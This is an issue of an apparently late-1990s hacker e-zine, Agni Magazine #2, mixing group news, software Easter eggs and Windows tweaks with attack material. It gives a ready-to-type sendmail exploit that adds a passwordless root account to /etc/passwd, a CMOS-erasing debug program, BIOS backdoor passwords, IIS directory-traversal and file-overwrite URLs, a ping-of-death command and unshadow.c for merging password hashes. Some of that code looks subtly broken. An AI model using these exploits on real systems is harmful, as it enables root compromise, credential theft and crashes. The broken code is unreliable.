



Welcome to Agni Magazine #2

Here's our situation. Due to the fact that I just was recently released from the hospital after having major jaw surgery, and I'm still battling some stupid-ass computer technicians in the court about my warranty. I'm forced to put out this issue of Agni Magazine in a totally text version. Why? Because the only machine that I have available to me is one that shuts off by itself every 20 minutes or so, and that only has 8 bit graphics (it's a very beautiful display I might add). But beside that fact, we have an extremely well done issue this month. And the most important part is that the articles are good.

I must apologize to some of you out there that might of had your hopes set on the Novell NetWare Series, that for right now was put on hold. This is due to all the email that was sent to me exclaiming that Windows NT is much more used now then Novell and that if I was going to do a special section on networking software it should thus be done on NT. So be it, this issue offers to you, the reader, several articles on the topics on Windows NT exploits and bugs... I hope you enjoy them. Plus remember that Agni Publications is always looking forward to your feedback. Keep in mind the material that you send. A thanks, or that article wasn't done well enough would be sufficient. Things to stay away from would be bitching about spelling or grammatical errors, due to the fact of human nature that nobody is fucking perfect. And to all you cool "elite kids" out there (sense the sarcasm in the typing), I would strongly appreciate no mail with the message body of "¥øû \$tûpîd £@m@h, ýøû døñ't kñøvv \$hîti". The literacy involved is too much for my small mind to comprehend.

For those of you that haven't heard about the newest location of the Agni Magazine site, find your way to <http://quantech.ml.org/agni>. Extra special thanks go out to Darkside of Ayurveda Productions and Quantum Technologies for hosting the site as a really large favor... Thanks. Anyway, enough blabbing on about utter bullshit, here's that issue you've been waiting for. BTW: I know there are spelling errors, I've seen them...but I'm trying to get this information out to all of you as fast as I can, that's the important part.

Disclaimer

The following states that all the information that Agni Publications provides and everything therefore withheld in the magazine and/or done by Agni Publications is for the growth of the knowledge towards anyone out there interested in computer security or the operations of a computer in general. Nothing that Agni Publications ever provides to the public is for the purpose of illegal actions by the readers of the magazine. Thus Agni Publications, it's writers and editors, the group that sponsors it, Ayurveda, or the Web Domain that is currently hosting their site, take absolutely no responsibility for any personal actions it's readers take which may involve the use of this knowledge towards illegal activity.

Table of Contents

1. What's going on with Ayurveda lately?
2. Current Member of Ayurveda
3. The Unix dead.letter Exploit for Sendmail v.8.8.4.
4. Debug code for a CMOS Cracker (eraser).
5. BIOS Supervisor Passwords
6. A Windows for Workgroups Bug (one on my favorites).
7. Some Windows NT Bugs, Exploits, and Holes
8. Unix Emulators for Win32
9. C Code - Unshadow.c
10. Software Easter Eggs (Part 2)
11. How to Change Your Animated Logo on Internet Explorer (most versions).
12. How to Speed up Your Zip drive, Without Buying The "New" ZipPlus.
13. How to Make Your Windows 95 Machine Boot and Exit like Win 3.x.
14. A List of Efnet and UnderNet for Those of You That Are Banned On Half of IRC
15. How Do I Apply To Ayurveda?
16. Coming Soon.
17. Special Thanks.

1. What's going on with Ayurveda lately?

Well, Ayurveda did have a few setbacks for release #1, so Agni Magazine was released independently without the pack. Devatas Dharma, Founder of Ayurveda, appointed Haze Inferno, creator of Agni Magazine, President of Ayurveda. Darkside, who is a member of Ayurveda and also the founder of Quantum Technologies has recently put up a domain name and will be hosting the Ayurveda and Agni Magazine web pages. This way we give all of the readers easier access to the magazine and all of the art packs in the future. The Agni Magazine web site will be located at <http://quantech.ml.org/agni>. As far as the Ayurveda page, just be patient on that one. Ayurveda is making release #1, to be released in late July or early August so look out for it. I'm sure you'll be able to find it on:

<ftp://ftp.cdrom.com/pub/artpacks/artpacks/1998/>

Or at the Agni Magazine site. A new cable modem courier joined with us. Mordack, is yet another cable modem courier that will be out there passing around the art and whatever else may be out there. MadArtist is no longer with us, because he found other things that needed to be done instead and common interests changed, so he felt the need to move on. Despair - found it in his best interest to change his handle out of the blue. So what this means to you... you won't see Despair on the member list anymore, you'll now be seeing Dominus.

Ok, I think that is going to be about it... Not much happening right now, we are just trying to give everyone a chance out there that wants to see the art. But for now, that's gonna be about all the information about Ayurveda your gonna get, cause I have nothing else to tell you. If any information comes to my attention that I feel you as the reader should know... You'll find out.

2. Current Member of Ayurveda

Devatas Dharma - Founder
Art Coordinator

Haze Inferno - President
Coordinator of Agni Magazine, art, literature, programming, courier

Darkside
Cable modem courier, programming, art, and Site operator

Dominus
Art and literature

Kakola Sengupta
Art and literature

Ivanneth Elemmírë
Art and literature

Mordack
Cable modem courier

Spiff
Cable modem courier

Tekrat-
Cable modem courier

Unright

Cable modem courier.

You can apply to Ayurveda, by reading the last article entitled "How to Apply to Ayurveda" and by following the instructions.

3. The Unix dead.letter Exploit for Sendmail v.8.8.4.

The Unix dead.letter Exploit for Sendmail v.8.8.4

Ok, first, what is this exploit? What does it do? This exploit uses sendmail v.8.8.4 and you must have a shell account on the server. The exploit then creates a link from the /etc/passwd to /var/tmp/dead.letter.

How to Exploit this Bug.

These are the commands you need to type:

```
<-----Start Here----->
ln /etc/passwd /var/tmp/dead.letter
telnet some.target.host 25
helo <domain-name>
mail from: lucifer@hell.com

rcpt to:  jesus@heavensgate.org
data
lucifer::0:0:Satan:/root:/bin/bash
.
quit
<-----Ends Here---->
```

*Idiot Note: Replace some.target.host with the server name, and replace the email with the proper ones. Also unless you want your username as lucifer, change that too.

If you notice on the lucifer account it has no password and root access.

How to fix this bug.

Login as root on your machine, then go in

```
cd /var/tmp
ls -l
```

If there is a file there called dead.letter you are safe---DO NOT DELETE THIS FILE. If there isn't a file there then type:

```
touch dead.letter
chmod 600 dead.letter
```

Now, this exploit will no longer work.

4. Debug code for a CMOS Cracker (eraser).

I figured that I can't have an article about BIOS passwords without having something about deleting CMOS to get around unknown passwords. Now, here is the debug code for a program called KillCMOS.

```
<-----Begin Code----->
a 100
```

```

in al,70
and al,e0
or al,0e
out 70,al
mov al,ff
out 71,al
ret

rcx
d
n killcmos.com
w
q
<---End Code---->

```

Just copy and paste the following code to a text file called cmos.txt. At the DOS prompt in the same directory as the cmos.txt file, type C:\>debug < cmos.txt.

This will then create a file in the directory called killcmos.com and it should be about 13 bytes. When you run this it will delete CMOS entries. When the computer is then rebooted you will get an error like this "CMOS Configuration Invalid, Please Press F1 to Enter Setup". So remember to save all your important configurations before you try this trick...

5. BIOS Supervisor Passwords

Well, I figured that I could have an article with a CMOS crack in it unless I went more in-depth by discussing supervisor passwords. For those of you that don't understand what I mean, I'm talking about a certain password that you would type in a certain BIOS type and get past the password placed on by the user, or in a better sense, to get into a system that you have forgotten the password to.

Award BIOS (most versions)

```

j262
AWARD_SW
AWARD_PW
lkwpeter

```

AmiBIOS

```

589589

```

Various passwords that work on a variety of BIOS types and versions.

```

condo
djonet
lkwpeter
biostar
biosstar

```

Now, other than supervisor passwords, let's discuss supervisor backdoors. On most IBM Aptiva's the password can be cleared by a simple process, by holding down both mouse buttons at the computer's boot up and hold them there until the computer completely boots.

Toshiba laptops have been known to have another one (this one hasn't been personally checked by myself). This is done by holding down the left shift button during the boot process.

That's it for now, if you have any other supervisor passwords that you know of, I ask that you please send them to me, at ayurveda_grp@hotmail.com.

6. A Windows For Workgroups Bug (and Win95 beta).

Written By:

Dan Shearer (itudps@lux.levels.unisa.edu.au)

Sat, 22 Jul 1995 12:42:25 +0930

- * Messages sorted by: [date][thread][subject][author]
- * Next message: Dan Shearer: "Re: Bug in Windows for Workgroups, Win95 beta"
- * Previous message: Cy Schubert - BCSC Open Systems Group: "Re:

[Linux-ISP] lpr(1) bug"

* Next in thread: Dan Shearer: "Re: Bug in Windows for Workgroups, Win95 beta"

The Samba development community have discovered a security hole in Workgroups and Win95 beta. Microsoft were officially informed, and appear to have fixed the problem in the release version of Windows 95. It still exists in Windows for Workgroups, and last I heard Microsoft were not committing to releasing a patch for the problem, but they didn't say they wouldn't either.

Affects

Any machine with Windows for Workgroups that is running TCP/IP as a file/print transport. Certainly Microsoft TCP/IP and most likely other stacks as well.

Effects

If the Workgroups machine shares any directory below root, a free Unix program that uses the Microsoft SMB protocol over TCP/IP can access the whole drive, with whatever permissions the sharename was given. These resources are advertised on a browse list that is made available to anyone on the local network by default, and to anyone on the Internet who knows the machine's IP address. Any user sharing anything without a password is automatically opening the whole disk to the whole Internet (for those that can locate the machine) and those with a password should be aware that Workgroups has no protection against brute force attacks.

To Reproduce

Start up "smbclient", and ask to connect to a resource. Then issue the commands "cd ../" or "cd ...", which are valid according to the SMB protocol. These servers move up to the next level directory (the one above the one that was shared on the network) without any complaint. I have tried other SMB servers such as Samba, Windows NT and OS/2 LAN Manager. Samba correctly denies access, NT incorrectly does not complain but does not appear to have a security problem, and LAN Manager handles it in the correct manner.

Why

The Microsoft Server Message Block (SMB) file and print sharing protocol is an X/Open standard. The Samba client implements the X/Open protocol properly, but these two Microsoft servers do not. As Andrew Tridgell said recently "It is nice of them to make it an X/Open standard, but as with most proprietary ideas it is much less rigorously tested than an RFC. For instance, there are three completely different date and time formats used at random throughout". So I suppose it is just the same sort of thinking carried into implementation.

Samba

You can find out about Samba at

<http://lake.canberra.edu.au/pub/samba/samba.html>.

Exploration

The Samba site has a link to the tcpdump patches by Andrew that understand SMB (and also NetBEUI, incidentally.)

Samba also comes with a file system for Linux that allows SMB resources to be mounted. Theoretically it would be possible to mount the disk of a Workgroups server and reshare it as, say, an FTP site or a Web site :-)

Dan Shearer

7. Some Windows NT Bugs, Exploits, and Holes.

Here are some random misc NT exploits.

Problem:

Internet Information Server 1.0 (IIS) allows the use of batch files as CGI applications. Using batch files as CGI applications exposed several security issues in IIS because the batch file processes run in the context of the full Windows NT console command processor (cmd.exe).

Problem:

Anonymous users have same access rights as Domain Users. Installing IIS on a PDC (typical) results in IUSR_<nodename> account becoming member of 'Domain Users'. This gives anonymous guests the access rights of 'Domain Users' group instead of 'Guests' group.

Problem:

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

Problem:

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

Problem:

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

Problem:

Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E

KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A

IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable sending large packets, but does not crash on receiving large packets.

8. Unix Emulators for Windows 95/NT

For all of you out there that don't want to sit at home partitioning away at your hard drive just to install the newest version of Slackware. Well, here are some new options for you, two Unix emulators that give you both the look and the feel of an actual Unix terminal.

The first site is for a Korn Shell Emulator:

Free for evaluation purposes from AT&T Research. It supports about 150 Unix commands and it can be found at:

<http://www.research.att.com/sw/tools/uwin/>

Next...

The Cygnus gnu-win32 project. Has a lot of ported GNU tools, like grep, bash, and even the compiler set with gcc, g++.

Find it at:

<http://www.cygnus.com/misc/gnu-win32/>

That's it... sorry I don't have anymore, just think of it this way... two more then you had before you read this article.

9. Unshadow.c

This C code was sent to me as is, with now copyright information. I did not write this code. If you can't figure it out, this code unshadows shadowed passwd files.

```
#include <stdio.h>
#include <string.h>

extern void *malloc_tiny(size_t size);

struct shadowinfo {
    char *login, *passwd;
    struct shadowinfo *next;
};

int unshadow(int argc, char **argv) {
    FILE *passwd, *shadow;
    struct shadowinfo *current, *hash[256];
    char s[256];

    char *p, *pe;
```

```

int hashval;

int hashfunc(char *login) {
    hashval = 0;
    while (*login) {
        hashval <<= 1; hashval ^= *login++;
    }
    hashval ^= hashval >> 8; return hashval &= 0xFF;
}

if (argc != 3) {
    puts("Usage: unshadow <passwd file> <shadow file> [> target file]");
    return 0;
}

if (!(passwd = fopen(argv[1], "r"))) {r      printf("Unable to open: %s\n",
argv[1]); return 1;
}
if (!(shadow = fopen(argv[2], "r"))) {

    printf("Unable to open: %s\n", argv[2]); return 1;
}

memset(hash, 0, sizeof(hash));

while (fgets(s, sizeof(s), shadow)) {
    if (p = strchr(s, '\r')) *p = 0;
    if (p = strchr(s, '\n')) *p = 0;

    if (!(p = strchr(s, ':'))) continue;
    *p++ = 0;
    if (!(pe = strchr(p, ':'))) pe = strchr(p, 0);
    if (pe - p < 1) continue;
    *pe = 0;

    current = hash[hashfunc(s)];
    if (!(hash[hashval] = malloc_tiny(sizeof(struct shadowinfo))) ||

        !(hash[hashval]->login = malloc_tiny(strlen(s) + 1)) ||
        !(hash[hashval]->passwd = malloc_tiny(strlen(p) + 1))) {
        puts("Not enough free memory"); return 1;
    }
    strcpy(hash[hashval]->login, s); strcpy(hash[hashval]->passwd, p);
    hash[hashval]->next = current;
}
fclose(shadow);

while (fgets(s, sizeof(s), passwd)) {
    if (p = strchr(s, '\r')) *p = 0;
    if (p = strchr(s, '\n')) *p = 0;

    if (!(p = strchr(s, ':'))) continue;

    *p++ = 0;
    if (!(pe = strchr(p, ':'))) pe = strchr(p, 0);

    if (current = hash[hashfunc(s)]) do
        if (!strcmp(current->login, s)) break;
    while (current = current->next);

    if (current) printf("%s:%s\n", s, current->passwd, pe);
    else printf("%s:%s\n", s, p);
}

```

```

    fclose(passwd);

    return 0;
}

```

10. Software Easter Eggs

For those of you that don't know what software "Easter eggs" are, I'll explain. It's basically a hidden image or message placed in by the programmers, usually under the noses of the producers of the software. Sometimes you'll get a list of the developers, sometimes a picture of his favorite stuffed animal... you never know what you can find in software.

Visual Basic 4.0

1. Add a text box to a form.
2. Change the text property to "Thunder".
3. Lock the control on the form.
4. Move the mouse over the tools in the toolbox.
5. Instead of the usual tool names appearing, you should see the names of the developers and testers.

Leisure Suit Larry 7

1. Go to Captain Queeg's ballroom.
2. Type "dream" in the "other" section when you click yourself.

Phantasmagoria

1. This works in all chapters except chapter one. Go to the Baby's room on the third floor.
2. Rapidly click on the picture of the baby hanging on the wall.
3. If you do it correctly the baby's eyes will begin to glow and you will hear a crazy laugh.

Phantasmagoria

1. In Curtis' home, click on the picture next to the book case to see the programming staff.

Phantasmagoria

1. You must do this the first time Adrienne uses the washroom.
2. Click on the bathroom chair seven times before clicking on the toilet.
3. There are several variants of this. To try them all, save the game prior to step one and then retry.

SimCity 2000

1. Load SimCity 2000. You don't have to have a new city.
2. Click on the bar of the toolbar. You can do this only in city building mode, not in landscape shaping.
3. Type "oivaizmir."
4. You should notice an extra menu called "Debug" that contains another menu called "Debug" that contains many different items.

SimCity 2000

1. Type "heck," "damn" or "darn" in the program to see a funny message.
2. Type "vers" to see the version number of the software.
3. Type "porn" to hear a programmer moan. "Can't get enough."
4. Type "memy" to check the computer's memory.

SimCity 2000

1. Run SimCity with a helicopter hovering around (i.e., build an airport).

2. Select the centering tool.
3. Click on the center of the helicopter.
4. If you aimed successfully, the pilot will say "I'm hit" and "Mayday!" before crashing the copter.

Photoshop

(known to work on 4.0, may work on 3.0---5.0 unknown)

1. Open Photoshop normally.
2. Open any pallet that has "pallet options" (layers, paths, etc).
3. Hold down ALT, click on the pallet menu and select "Pallet Options."
4. Merlin will appear, next to a flower.
5. Click the "Begone" button to make hime disappear.

Ok, that's it....

This will be the last time I put any software Easter eggs in here, unless specially requested by one of you to keep up the process.

11. How to Change the Animated Logo on Internet Explorer

(Some versions)

Ok, this doesn't work on all version of IE, which version it works on however are on clear, but I know it works on 3.0. I'll try to make this simple, short, and sweet.

- 1) Bring up an art program (if you are looking for something basic, hell, bring up MSPaint).
- 2) The image attributes should be width=40 and height=480 (not inches, pixels.).
- 3) Make a series of pictures, each one 40X40. If you desire you could just make 4 40X40 images and then later paste them into a 40X480 picture.
- 4) If you don't do that you need to split up the 40X480 image into a series of images each 40X40.
- 5) Now, make the very top image the one that you want to be the one to just sit there when IE is doing absolutely nothing.
- 6) The other three will be the ones that it uses to play through to make the animation.
- 7) Now, run your registry editor (regedit.exe) it's in the Windows directory.
- 8) Click the "HKEY_CURRENT_USER
- 9) The click "Software".
- 10) Then "Microsoft"
- 11) Then "Internet Explorer".
- 12) Then "Toolbar".
- 13) On the task bar, click "Edit" and then "Find", Type "Brandbitmap", in the find window.
- 14) Now double click on Brandbitmap to get a dialog windows, just type in the path and the file name of you custom made animated logo into the blanks, and your done.

Simple Enough?

12. How to make your ZipDrive go as fast as a ZipPlus.

Ok everyone, for all of you out there with Zip drives I found a new trick for you. Users of parallel-port Zip drives have reported substantial improvements in performance with the new version of Ppa.mpd (v2.22) that comes with the new Win95 software.

The file is located in the driver pack, Zplus95.exe. DO NOT INSTALL THIS FILE.. Installing it will give you more errors than you can count on both hands. Download it, use a utility such as WinZip, and extract only that file. It should then be copied to your Windows\System\Iosubsys directory to then replace the previous version.

The English version can be found here:

<ftp://ftp.iomega.com/pub/english/Zplus95.exe>

For those of you not running Windows 95... there are also other Zplus* files for other operating systems.

Just trying to save you some money...

13. How to Make Windows 95 boot and exit like Windows 3.x

Ok, for those of you Windows 3.x fans out there, here 's a little trick I read in PC Magazine Sept. 10, 1996 on page 339, a letter from Mr. Gary Tessler. This trick then later appeared in The Happy Hacker Digest on May 6, 1998, sent in by Willaim C. Topp.

1) First off, make sure at least the following path is included in your autoexec.bat:

PATH c:\windows;c:\windows\command;c:\dos

2) Edit autoexec.bat so that the last line is

WIN

3) Delete or rename c:\windows\logos.sys and c:\windows\logow.sys.

4) Find c:\msdos.sys and change the attributes from hidden and read-only edit this file with notepad to include the statement.

BootGui=0 (that's zero)

in the [options] section

This boots your computer first to DOS then to Windows 95...then when you goto shutdown it will exit to a straight DOS prompt, just like old Windows 3.1. Ok...dumb trick...but you know you'll try it.

14. List Of IRC Servers For those of you Klined on half of IRC.

LIST OF SOME UNDERNET SERVERS
channels2.undernet.org

Rochester.MI.US.undernet.org
Caen.Fr.Eu.UnderNet.org
auckland.nz.undernet.org
Santiago.CL.undernet.org
SanJose.CA.US.Undernet.Org
Oxford.UK.EU.undernet.org
Uworld.undernet.org
Telnet2.US.undernet.org
Norman.OK.US.undernet.org
Ljubljana.Si.Eu.undernet.org
oslo.no.eu.undernet.org
Vienna.AT.EU.UnderNet.org
Gothenburg.SE.EU.undernet.org
wollongong.nsw.au.undernet.org
brisbane.qld.au.undernet.org
Amsterdam.NL.EU.undernet.org
Vancouver.BC.CA.Undernet.Org
montreal.qu.ca.undernet.org
Phoenix.AZ.US.UnderNet.org
davis-1.ca.us.undernet.org
Uworld2.undernet.org
channels.undernet.org
davis.ca.us.undernet.org
davis-r.ca.us.undernet.org
Manhattan.KS.US.Undernet.Org
austin.tx.us.undernet.org
Pittsburgh.PA.US.Undernet.org
Chicago.IL.US.Undernet.org
washington.dc.us.undernet.org

LIST OF SOME EFNET SERVERS

irc.apk.net
irc.ethz.ch
irc.sanet.sk
irc.felk.cvut.cz
irc.agh.edu.pl
dismayl.demon.co.uk
coanwood.ncl.ac.uk
serv.eng.abdn.ac.uk
Eurecom8.Cica.FR
sil.polytechnique.fr
irc.sci.kun.nl
krilin.upc.es
irc.nijenrode.nl
irc.ut.ee
irc.ru
isgate.is
irc.iastate.edu
irc.ecn.uoknor.edu
irc.umn.edu
irc.catt.ncsu.edu
irc.ais.net
irc.virginia.edu
irc.delphi.com
red-dwarf.cit.cornell.edu
irc.cs.rpi.edu
azure.acsu.buffalo.edu

world.std.com
irc.best.com
irc.ilstu.edu
irc.winternet.com
irc.mo.net
irc.caltech.edu
irc.pitt.edu
irc.ecn.bgu.edu
irc.digex.net
organ.ctr.columbia.edu
irc.harvard.edu
irc-2.mit.edu
anarchy.tamu.edu
joyce.eng.yale.edu
irc.cris.com
irc.io.org
irc.bridge.net
irc.epix.net
irc.neosoft.com
irc.uiuc.edu
irc.math.byu.edu
irc.mcs.net
eff.org
irc.colorado.edu

15. How Do I Apply To Ayurveda?

Please paste the following information in a text document and email it to ayurveda_grp@hotmail.com with the subject text APPLICATION.

Handle:

Last Name: First Name:

Age:

1. Voice Phone #: (don't go thinking I'm going to call you)
2. Internet Connection Speed:
3. How many years have you been in the computer scene?
4. What do you do? (Courier, SiteOp/Webmaster, Artist, Programmer, Botmaster)
5. How do you believe you will be able to help Ayurveda?
6. If your an artist, which is your speciality? (ANSI, ASCII, RIP, SVGA)
7. Do you have any past group experience? Which group?

16. Coming Soon!

Well, first of all coming soon are the damn graphics I did for this magazine which I currently can't use (this was explained earlier....have you been reading?). I'm also looking for another look for the magazine...I know I have done this thing once and already am I trying to recreate to all over again to try and make it tough on myself. First thing, I'm trying to do would be to have a comments section, were you could directly send your comment via email on one of the articles...this would then be the same for the application to Ayurveda. That I'm sure would make it a little easy on you , so you don't have to remember email addresses or whatever, you can fill out the empty blanks as you read. More to come on the Windows NT Section, I hoping...but don't write that in stone. I'm trying to get my software easter eggs, because that's one of the sections that seem to be very popular. I'm also working on an HTML browser crash code, it's looking nice so far. Basically, for all the Windows 98 and Active

Desktop users out there, it's not a good thing. What it does is completely crash the browser, and being AD and 98 have the browser and shell tied together---well you get the idea. I'm also working on an article for those HTML users out there with HTML tricks, doing things normally done with Java, but with HTML--and that will end the HTML article for now. Any ideas that you have are welcome..please send them to ayurveda_grp@hotmail.com and use the subject "Agni Magazine", that way it will be looked at right away rather than being pushed around by all the other ones that have no subject text. Well, That's it! This brings Agni Magazine Issue #2 to a close, I hope your liking it. I'm doing my best to find good material to place in here to you.

I'll see ya next month,

Haze Inferno

17. Special Thanks

darkside

Again I begin the thank you to DarkSide by saying "Thanks for fixing all my mistakes back in the day, and thanks for all the mistakes I know that you will fix in the future". Thank you for the site, and for the use of your most beautiful box :).

devatas dharma

Thanks for the great opportunity you have given me, it truly means a lot. And thanks for all of your help that you've ever offered.

dominus

Thanks for trying to be true to yourself, you do your best. If life gets tough for you, just kick it in the throat.

tekrat-

Thanks for building that ol' computer for me, and thanks for letting me use yours now and again.

Now I can bet on the fact that I forgot a lot of people, I just hope you except the fact I'm sorry. And I thank all the readers, all the same.